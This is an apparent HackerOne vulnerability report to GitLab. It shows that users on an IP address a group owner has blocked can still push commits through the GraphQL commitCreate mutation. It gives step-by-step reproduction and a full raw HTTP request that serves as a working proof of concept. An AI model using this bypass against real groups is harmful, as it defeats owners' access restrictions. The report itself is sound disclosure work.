Users on banned IP addresses can still commit to projects
HackerOne report #1914049 by js_noob
on 2023-03-21, assigned to GitLab Team
:
Report | Attachments | How To Reproduce
Report
Summary
Hello team, as a part of the grp/project security an owner can block certain IP addresses from accessing that group resources (projects,...). However, even if a user is on a blocked IP address he can still commit to projects.
Steps to reproduce
- Create a grp, project and add a maintainer
- From the owner navigate to https://gitlab.com/groups/YOUR_GRP/-/edit#js-permissions-settings and add the maintainer IP address under
Restrict access by IP address
- From the maintainer navigate to https://gitlab.com/GRP/PROJECT/-/tree/main and verify the 404
- From the maintainer send the following request, but change the variables according to your preferences
POST /api/graphql HTTP/2
Host: gitlab.com
Cookie: YOUR_COOKIES
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://gitlab.com/-/graphql-explorer?_gl=1*1mb1g5a*_ga*MjM3Mzk5MDUzLjE2NzczMjcxMTY.*_ga_ENFH3X7M5Y*MTY3ODk4Mzg2Ni40LjEuMTY3ODk4MzkwNi4wLjAuMA..
Content-Type: application/json
X-Csrf-Token: xD3r11jgwirOfA6E1GB1pL9ZEuq8lqQCYcrZo4eSO8xbfvb9kmkI5BmsLqWWtgLw894u3hwjqXeGO4LbPJ_cNg
Content-Length: 489
Origin: https://gitlab.com
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"query":"mutation MyMutation {\n commitCreate(\n input: {\n projectPath: \"test645811/project-1\",\n branch: \"main\",\n message: \"This is a Commit\",\n actions: [\n {\n action: UPDATE,\n filePath: \"README.md\",\n content: \"This is a test content\",\n encoding: TEXT\n }\n ]\n }\n ) {\n commit {\n author {\n name\n }\n }\n }\n}\n","variables":null,"operationName":"MyMutation"}
- Verify the successful response and from the owner verify the creation of the commit
Video/POC
bandicam_2023-03-21_20-40-59-702.mp4
Impact
Users from banned IP addresses can manage push changes to project where they should be completely blocked from accessing any project that belongs to that group.
Attachments
Warning: Attachments received through HackerOne, please exercise caution!
How To Reproduce
Please add reproducibility information to this section: